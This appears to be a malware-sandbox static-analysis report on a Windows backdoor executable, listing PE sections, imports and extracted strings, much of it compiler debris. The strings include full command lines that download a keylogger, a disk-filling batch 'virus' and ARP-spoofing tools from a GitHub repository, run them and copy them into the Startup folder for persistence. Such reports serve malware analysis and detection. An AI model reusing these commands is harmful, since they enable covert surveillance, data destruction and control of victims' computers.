popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2021-08-07 14:32:40

PE Imphash

8e93afb33c433eede3fd358369a7f47e

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00004328 0x00004400 6.09481058298
.data 0x00006000 0x0000001c 0x00000200 0.222389470473
.rdata 0x00007000 0x000025ec 0x00002600 5.33588486086
/4 0x0000a000 0x00000cb4 0x00000e00 4.58911058446
.bss 0x0000b000 0x00000078 0x00000000 0.0
.idata 0x0000c000 0x00000e48 0x00001000 4.78198554576
.CRT 0x0000d000 0x00000018 0x00000200 0.114463381259
.tls 0x0000e000 0x00000020 0x00000200 0.217769955458
/14 0x0000f000 0x00000038 0x00000200 0.21620690744
/29 0x00010000 0x00001cff 0x00001e00 5.76472518331
/41 0x00012000 0x0000012f 0x00000200 3.04408429956
/55 0x00013000 0x000001c8 0x00000200 4.30791686381
/67 0x00014000 0x00000038 0x00000200 0.678482794849

Imports

Library KERNEL32.dll:
0x40c25c AllocConsole
0x40c268 ExitProcess
0x40c26c FindClose
0x40c270 FindFirstFileA
0x40c274 FindNextFileA
0x40c278 FreeLibrary
0x40c27c GetCommandLineA
0x40c280 GetLastError
0x40c284 GetModuleHandleA
0x40c288 GetProcAddress
0x40c28c GetStartupInfoA
0x40c298 LoadLibraryA
0x40c2a0 Sleep
0x40c2a4 TlsGetValue
0x40c2a8 VirtualProtect
0x40c2ac VirtualQuery
Library msvcrt.dll:
0x40c2b4 _chdir
0x40c2b8 _strdup
0x40c2bc _stricoll
Library msvcrt.dll:
0x40c2c4 __getmainargs
0x40c2c8 __mb_cur_max
0x40c2cc __p__environ
0x40c2d0 __p__fmode
0x40c2d4 __set_app_type
0x40c2d8 _cexit
0x40c2dc _errno
0x40c2e0 _fpreset
0x40c2e4 _fullpath
0x40c2e8 _iob
0x40c2ec _isctype
0x40c2f0 _onexit
0x40c2f4 _pclose
0x40c2f8 _pctype
0x40c2fc _popen
0x40c300 _setmode
0x40c304 abort
0x40c308 atexit
0x40c30c calloc
0x40c310 exit
0x40c314 fgets
0x40c318 free
0x40c31c fwrite
0x40c320 malloc
0x40c324 mbstowcs
0x40c328 memcmp
0x40c32c memcpy
0x40c330 memset
0x40c334 printf
0x40c338 puts
0x40c33c realloc
0x40c340 setlocale
0x40c344 signal
0x40c348 strcat
0x40c34c strcmp
0x40c350 strcoll
0x40c354 strcpy
0x40c358 strlen
0x40c35c strncmp
0x40c360 strncpy
0x40c364 strtok
0x40c368 tolower
0x40c36c vfprintf
0x40c370 wcstombs
Library USER32.dll:
0x40c378 FindWindowA
0x40c37c ShowWindow
Library WSOCK32.DLL:
0x40c384 WSACleanup
0x40c388 WSAStartup
0x40c38c closesocket
0x40c390 connect
0x40c394 htons
0x40c398 inet_addr
0x40c39c recv
0x40c3a0 send
0x40c3a4 socket
Library libgcc_s_dw2-1.dll:
0x40c3ac _Unwind_Resume
0x40c3b8 __udivdi3
Library libstdc++-6.dll:
0x40c3d0 _ZNSaIcEC1Ev
0x40c3d4 _ZNSaIcED1Ev
0x40c3d8 _ZNSolsEPFRSoS_E
0x40c400 _ZSt4cerr
0x40c404 _ZSt4cout
!This program cannot be run in DOS mode.
P`.data
.rdata
0@.bss
.idata
t(<{t?
</t&<\t"
libgcc_s_dw2-1.dll
__register_frame_info
__deregister_frame_info
libgcj-16.dll
_Jv_RegisterClasses
ConsoleWindowClass
Try to connection
[+] - Connected ^_^
[CMD] -
[ERR] - Error in recv() ! . Quitting
[ERR] - Server disconnected
download
apps_list
echo [APPLIST] [INFO] - This command allows you to view all the applications installed on the victim's device as well as those that are currently running
powershell -Command "Get-Process | Format-Table Handles,NPM,PM,WS,CPU,Id,SI,ProcessName,Name,Mainwindowtitle -AutoSize"
powershell -Command "Get-Process | Where-Object { $_.MainWindowTitle } | Format-Table Handles,NPM,PM,WS,CPU,Id,SI,ProcessName,Name,Mainwindowtitle -AutoSize"
powershell -Command "Get-AppxPackage"
startup
keylog
echo [EXT] [INFO] - This extension is built in C++ language and it logs all mouse and keyboard events and makes them available in C:\ProgramData\Ms\log.txt file. And the keylogger.exe file is in C:\ProgramData\Ms All events will be added to the file cumulatively, you can delete it if you want to re-registration, or you can use the following command: $ ext reset keylog
&& echo. && echo [ $ ] - Available Commands :
&& echo [ $ ext run keylog ] - for start recording
&& echo [ $ ext info keylog ] - show some info for keylog extension
&& echo [ $ ext reset keylog ] - delete keylog file : C:\ProgramData\Ms\log.txt
fill_storage
echo [EXT] [INFO] - This extension is built in betch, This add-on fills the device with large files and is created very quickly so that the storage capacity of the device can be filled in three seconds, and you can also make it more dangerous by copying the file fill_storage_move.bat to C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup . So that it works automatically when you startup the device
&& echo [ $ ext run fill_storage ] - for start fill storage
&& echo [ $ ext startup fill_storage ] - copying the file fill_storage_move.bat to C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
&& echo [ $ ext info fill_storage ] - show some info for fill_storage extension
&& echo [ $ ext run nmap ] - for download & make it ready for run
&& echo [ $ C:\ProgramData\Ms\Nmap\nmap ] - for start nmap
&& echo [ $ ext info nmap ] - show some info for nmap extension
arp_spoof
&& echo [ $ ext run arp_spoof ] - for download and make it ready for run
&& echo [ $ C:\ProgramData\Ms\arp_spoof\arp_spoof.py ] - for start arp_spoof
&& echo [ $ ext info arp_spoof ] - show some info for arp_spoof extension
echo [EXT] [INFO] - The extensions are based on multiple languages and different functions that achieve what the hacker wants to control the victim's device in a simple and fast way && echo Available extensions : && echo -- keylog && echo -- fill_storage && echo -- networks_profile && echo -- nmap && echo -- arp_spoof
IF NOT EXIST C:\ProgramData ( mkdir C:\ProgramData ) ELSE ( echo; ) && IF NOT EXIST C:\ProgramData\Ms ( mkdir C:\ProgramData\Ms ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - keylogextension in C:\ProgramData\Ms\keylogger.exe && echo [EXT] [RUN] - keylog extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/keylogger.exe -o C:\ProgramData\Ms\keylogger.exe && IF EXIST C:\ProgramData\Ms\keylogger.exe ( start C:\ProgramData\Ms\keylogger.exe ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - Nmap extension in C:\ProgramData\Ms\Nmap && echo [EXT] [RUN] - C:\ProgramData\Ms\Nmap\nmap && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/Nmap.zip -o C:\ProgramData\Ms\Nmap.zip && IF EXIST C:\ProgramData\Ms\Nmap.zip ( powershell -Command "Expand-Archive -Path "C:\ProgramData\Ms\Nmap.zip" -DestinationPath "C:\ProgramData\Ms"" ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - arp_spoof extension in C:\ProgramData\Ms\arp_spoof && echo [EXT] [RUN] - C:\ProgramData\Ms\arp_spoof\arp_spoof.py && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/arp_spoof.zip -o C:\ProgramData\Ms\arp_spoof.zip && IF EXIST C:\ProgramData\Ms\arp_spoof.zip ( powershell -Command "Expand-Archive -Path "C:\ProgramData\Ms\arp_spoof.zip" -DestinationPath "C:\ProgramData\Ms"" ) ELSE ( echo; )
networks_profile
&& echo. && echo [EXT] [DOWNLOAD] - networks_profile extension in C:\ProgramData\Ms\networks_profile.exe && echo [EXT] [RUN] - networks_profile extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/networks_profile.exe -o C:\ProgramData\Ms\networks_profile.exe && IF EXIST C:\ProgramData\Ms\networks_profile.exe ( start C:\ProgramData\Ms\networks_profile.exe ) ELSE ( echo; )
&& echo [EXT] [DOWNLOAD] - fill_storage [ move.bat, virus.bat ] extension in C:\ProgramData\Ms && echo [EXT] [RUN] - fill_storage extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_move.bat -o C:\ProgramData\Ms\fill_storage_move.bat && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_virus.bat -o C:\ProgramData\Ms\fill_storage_virus.bat && IF EXIST C:\ProgramData\Ms\fill_storage_move.bat ( start C:\ProgramData\Ms\fill_storage_move.bat ) ELSE ( echo; )
test_virus
&& echo [EXT] [DOWNLOAD] - test [ move.bat, virus.bat ] extension in C:\ProgramData\Ms && echo [EXT] [RUN] - test_virus extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_move.bat -o C:\ProgramData\Ms\test_move.bat && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_virus.bat -o C:\ProgramData\Ms\test_virus.bat
&& IF EXIST C:\ProgramData\Ms\test_move.bat ( start C:\ProgramData\Ms\test_move.bat ) ELSE ( echo; )
echo [EXT] [ERR] - You must use a valid extension name !
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/keylogger.exe -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_move.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_virus.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_virus.bat"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_move.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_move.bat" && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_virus.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_virus.bat"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.bat" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_move.bat" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/backdoor.exe -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.exe"
powershell -Command "Stop-Process -Name "keylogger"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\keylogger.exe"} | Stop-Process -WhatIf"
powershell -Command "Stop-Process -Name "fill_storage_virus"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\fill_storage_virus.bat"} | Stop-Process -WhatIf"
powershell -Command "Stop-Process -Name "arp_spoof"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\arp_spoof.exe"} | Stop-Process -WhatIf"
%s --- %s
Mingw runtime failure:
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
glob-1.0-mingw32
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (MinGW.org GCC-6.3.0-1) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
AllocConsole
DeleteCriticalSection
EnterCriticalSection
ExitProcess
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
GetCommandLineA
GetLastError
GetModuleHandleA
GetProcAddress
GetStartupInfoA
InitializeCriticalSection
LeaveCriticalSection
LoadLibraryA
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
_chdir
_strdup
_stricoll
__getmainargs
__mb_cur_max
__p__environ
__p__fmode
__set_app_type
_cexit
_errno
_fpreset
_fullpath
_isctype
_onexit
_pclose
_pctype
_popen
_setmode
atexit
calloc
fwrite
malloc
mbstowcs
memcmp
memcpy
memset
printf
realloc
setlocale
signal
strcat
strcmp
strcoll
strcpy
strlen
strncmp
strncpy
strtok
tolower
vfprintf
wcstombs
FindWindowA
ShowWindow
WSACleanup
WSAStartup
closesocket
connect
inet_addr
socket
_Unwind_Resume
__deregister_frame_info
__register_frame_info
__udivdi3
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
_ZNSaIcEC1Ev
_ZNSaIcED1Ev
_ZNSolsEPFRSoS_E
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
_ZNSt8ios_base4InitC1Ev
_ZNSt8ios_base4InitD1Ev
_ZSt4cerr
_ZSt4cout
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__gxx_personality_v0
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
WSOCK32.DLL
libgcc_s_dw2-1.dll
libstdc++-6.dll
../../../src/gcc-6.3.0/libgcc/config/i386/cygwin.S
/home/keith/src/mingw/gcc-build/gcc-6.3.0-mingw32-cross-native/mingw32/libgcc
GNU AS 2.28
GNU C11 6.3.0 -mtune=generic -march=i586 -g -g -g -O2 -O2 -O2 -fbuilding-libgcc -fno-stack-protector
../../../src/gcc-6.3.0/libgcc/libgcc2.c
/home/keith/src/mingw/gcc-build/gcc-6.3.0-mingw32-cross-native/mingw32/libgcc
unsigned int
short unsigned int
long long int
long double
long int
_iobuf
_charbuf
_bufsiz
_tmpfname
short int
long unsigned int
__mb_cur_max
_sys_nerr
_sys_errlist
_osver
_winver
_winmajor
_winminor
_fmode
sizetype
optind
optopt
opterr
optarg
_daylight
_timezone
_tzname
daylight
timezone
tzname
hashval_t
htab_hash
htab_eq
htab_hash_pointer
htab_eq_pointer
unsigned char
stringop_alg
no_stringop
libcall
rep_prefix_1_byte
rep_prefix_4_byte
rep_prefix_8_byte
loop_1_byte
unrolled_loop
vector_loop
last_alg
unspec_strings
unspecv_strings
stringop_strategy
noalign
stringop_algs
unknown_size
processor_costs
shift_var
shift_const
mult_init
mult_bit
divide
large_insn
move_ratio
movzbl_load
int_load
int_store
fp_move
fp_load
fp_store
mmx_move
mmx_load
mmx_store
sse_move
sse_load
sse_store
mmxsse_to_integer
l1_cache_size
l2_cache_size
prefetch_block
simultaneous_prefetches
branch_cost
memcpy
memset
scalar_stmt_cost
scalar_load_cost
scalar_store_cost
vec_stmt_cost
vec_to_scalar_cost
scalar_to_vec_cost
vec_align_load_cost
vec_unalign_load_cost
vec_store_cost
cond_taken_branch_cost
cond_not_taken_branch_cost
ix86_cost
ix86_size_cost
ix86_tune_indices
X86_TUNE_SCHEDULE
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_MOVX
X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_FUSE_CMP_AND_BRANCH_32
X86_TUNE_FUSE_CMP_AND_BRANCH_64
X86_TUNE_FUSE_CMP_AND_BRANCH_SOFLAGS
X86_TUNE_FUSE_ALU_AND_BRANCH
X86_TUNE_REASSOC_INT_TO_PARALLEL
X86_TUNE_REASSOC_FP_TO_PARALLEL
X86_TUNE_ACCUMULATE_OUTGOING_ARGS
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_PAD_RETURNS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_LCP_STALL
X86_TUNE_READ_MODIFY
X86_TUNE_USE_INCDEC
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_OPT_AGU
X86_TUNE_AVOID_LEA_FOR_ADDR
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_MISALIGNED_MOVE_STRING_PRO_EPILOGUES
X86_TUNE_USE_SAHF
X86_TUNE_USE_CLTD
X86_TUNE_USE_BT
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_FFREEP
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_VECTORIZE_DOUBLE
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
X86_TUNE_INTER_UNIT_MOVES_TO_VEC
X86_TUNE_INTER_UNIT_MOVES_FROM_VEC
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_SPLIT_MEM_OPND_FOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_SLOW_PSHUFB
X86_TUNE_VECTOR_PARALLEL_EXECUTION
X86_TUNE_AVOID_4BYTE_PREFIXES
X86_TUNE_AVX256_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_AVX256_UNALIGNED_STORE_OPTIMAL
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_ALWAYS_FANCY_MATH_387
X86_TUNE_UNROLL_STRLEN
X86_TUNE_SHIFT1
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_FAST_PREFIX
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_HIMODE_MATH
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_USE_XCHGB
X86_TUNE_USE_MOV0
X86_TUNE_NOT_VECTORMODE
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_AVOID_FALSE_DEP_FOR_BMI
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_QIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_ADJUST_UNROLL
X86_TUNE_ONE_IF_CONV_INSN
X86_TUNE_LAST
ix86_tune_features
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
ix86_arch_features
x86_prefetch_sse
_dont_use_tree_here_
x86_mfence
reg_class
NO_REGS
AD_REGS
CLOBBERED_REGS
Q_REGS
NON_Q_REGS
INDEX_REGS
LEGACY_REGS
GENERAL_REGS
FP_TOP_REG
FP_SECOND_REG
FLOAT_REGS
SSE_FIRST_REG
NO_REX_SSE_REGS
SSE_REGS
EVEX_SSE_REGS
BND_REGS
ALL_SSE_REGS
MMX_REGS
FP_TOP_SSE_REGS
FP_SECOND_SSE_REGS
FLOAT_SSE_REGS
FLOAT_INT_REGS
INT_SSE_REGS
FLOAT_INT_SSE_REGS
MASK_EVEX_REGS
MASK_REGS
ALL_REGS
LIM_REG_CLASSES
dbx_register_map
dbx64_register_map
svr4_dbx_register_map
x86_64_ms_sysv_extra_clobbered_registers
processor_type
PROCESSOR_GENERIC
PROCESSOR_I386
PROCESSOR_I486
PROCESSOR_PENTIUM
PROCESSOR_LAKEMONT
PROCESSOR_PENTIUMPRO
PROCESSOR_PENTIUM4
PROCESSOR_NOCONA
PROCESSOR_CORE2
PROCESSOR_NEHALEM
PROCESSOR_SANDYBRIDGE
PROCESSOR_HASWELL
PROCESSOR_BONNELL
PROCESSOR_SILVERMONT
PROCESSOR_KNL
PROCESSOR_SKYLAKE_AVX512
PROCESSOR_INTEL
PROCESSOR_GEODE
PROCESSOR_K6
PROCESSOR_ATHLON
PROCESSOR_K8
PROCESSOR_AMDFAM10
PROCESSOR_BDVER1
PROCESSOR_BDVER2
PROCESSOR_BDVER3
PROCESSOR_BDVER4
PROCESSOR_BTVER1
PROCESSOR_BTVER2
PROCESSOR_ZNVER1
PROCESSOR_max
ix86_tune
ix86_arch
ix86_preferred_stack_boundary
ix86_incoming_stack_boundary
regclass_map
signed char
UQItype
long long unsigned int
complex float
double
complex double
complex long double
__float128
__unknown__
__popcount_tab
__clz_tab
func_ptr
__CTOR_LIST__
__DTOR_LIST__
../../../src/gcc-6.3.0/libgcc/config/i386
cygwin.S
""YK0g=YY0/>""
/home/keith/mingw32-gcc-6.3.0/include
../../../src/gcc-6.3.0/libgcc/../include
../.././gcc
../../../src/gcc-6.3.0/libgcc/../gcc/config/i386
../../../src/gcc-6.3.0/libgcc
stdio.h
stdlib.h
getopt.h
time.h
hashtab.h
insn-constants.h
i386.h
i386-opts.h
libgcc2.h
gbl-ctors.h
libgcc2.c
_atexit
__onexit0
cygming-crtbegin.c_obj
.rdata
backdoor.cpp
___tcf_0
.rdata
.ctors
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$4
.idata$5
.idata$74
.idata$5
.idata$4T
.idata$6,
@feat.00
.idata$70
.idata$5
.idata$4P
.idata$6
@feat.00
.idata$7,
.idata$5
.idata$4L
.idata$6
@feat.00
.idata$7(
.idata$5
.idata$4H
.idata$6
.idata$7$
.idata$5
.idata$4D
.idata$6
.idata$7
.idata$5
.idata$4@
.idata$6|
@feat.00
.idata$7
.idata$5
.idata$4<
.idata$6`
@feat.00
.idata$7
.idata$5
.idata$48
.idata$6
@feat.00
.idata$7
.idata$5
.idata$44
.idata$6
@feat.00
.idata$7
.idata$5
.idata$40
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4,
.idata$6`
@feat.00
.idata$7
.idata$5
.idata$4(
.idata$6$
@feat.00
.idata$7
.idata$5
.idata$4$
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6|
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6l
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6(
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6d
@feat.00
___main
.CRT$XDZ
.CRT$XDA
.CRT$XLA
.tls$ZZZ
.tls$AAA
.rdata
.idata$7
.idata$5
.idata$4
.idata$6@
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6$
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
libgcc2.c
.idata$5
.idata$6
.idata$4
.idata$5
.rdata
.rdata
_sleep
.idata$5p
.idata$6
.idata$5l
.idata$6x
.idata$5h
.idata$6n
.idata$5d
.idata$6d
.idata$5`
.idata$6Z
.idata$5\
.idata$6P
.idata$5X
.idata$6F
.idata$5T
.idata$6<
.idata$5P
.idata$62
.idata$5L
.idata$6(
.idata$5H
.idata$6
.idata$5D
.idata$6
.idata$5@
.idata$6
.idata$5<
.idata$6
.idata$58
.idata$6
.idata$54
.idata$6
.idata$50
.idata$6
.idata$5,
.idata$6
.idata$5(
.idata$6
.idata$5$
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$6
.idata$5
.idata$6z
.idata$5
.idata$6n
.idata$5
.idata$6d
.idata$6Z
.idata$5
.idata$6P
.idata$6F
.idata$5
.idata$6:
.idata$62
.idata$5
.idata$6&
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$6
.idata$5
.idata$6
.idata$4
.idata$5
.idata$5|
.idata$6
.idata$5x
.idata$6
.idata$4
.idata$5x
.idata$5
.idata$6
.idata$5
.idata$6t
.idata$5
.idata$6f
.idata$5
.idata$6@
.idata$5
.idata$60
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5|
.idata$6
.idata$5x
.idata$6
.idata$5t
.idata$6
.idata$5p
.idata$6r
.idata$5l
.idata$6f
.idata$5h
.idata$6X
.idata$5d
.idata$6@
.idata$5`
.idata$6(
.idata$5\
.idata$6
.idata$4
.idata$5\
.idata$7
.idata$5
.idata$4
.idata$6X
@feat.00
.idata$5
.idata$6
.idata$5
.idata$6
cygming-crtend.c
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6^
.rdata
.idata$2d
.idata$5
.idata$4
.idata$2x
.idata$5
.idata$4
.idata$4
.idata$5
.idata$7
.idata$4X
.idata$5
.idata$78
__cexit
_strcat
_strcmp
__errno
_recv@16p
___xl_c
___xl_z
__popen
_strcoll0?
__dll__
_fwrite
_strncpy
_memcpy
_memset
__argc
_chdir
_tolower
___xl_a
___xl_d
__CRT_MTl
_send@16h
_strdup
__argv
_calloc
__fmode
_reallocX?
__end__
_signal
_malloc
_strcpy
_memcmp
__pclose
_strtok
_abort
_strncmp
_htons@4
_fgets
_strlen
_printf
_Sleep@4
.eh_frame
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_frame
__mingw32_init_mainargs
_mainCRTStartup
_WinMainCRTStartup
_deregister_frame_fn
___JCR_LIST__
___gcc_register_frame
___gcc_deregister_frame
.eh_frame
.rdata$zzz
__ZStL19piecewise_construct
.text$_ZNSt11char_traitsIcE7compareEPKcS2_j
__ZNSt11char_traitsIcE7compareEPKcS2_j
.text$feof
__ZStL8__ioinit
_WinMain@16
__Z9AdditionsB5cxx11Pc
__Z10CE_InfoExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z9CE_RunExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z13CE_StartupExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z10CE_StopExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z11strincludesPcS_
__Z6strsubPcii
.text$_ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__Z41__static_initialization_and_destruction_0ii
__GLOBAL__sub_I_sock
.gcc_except_table
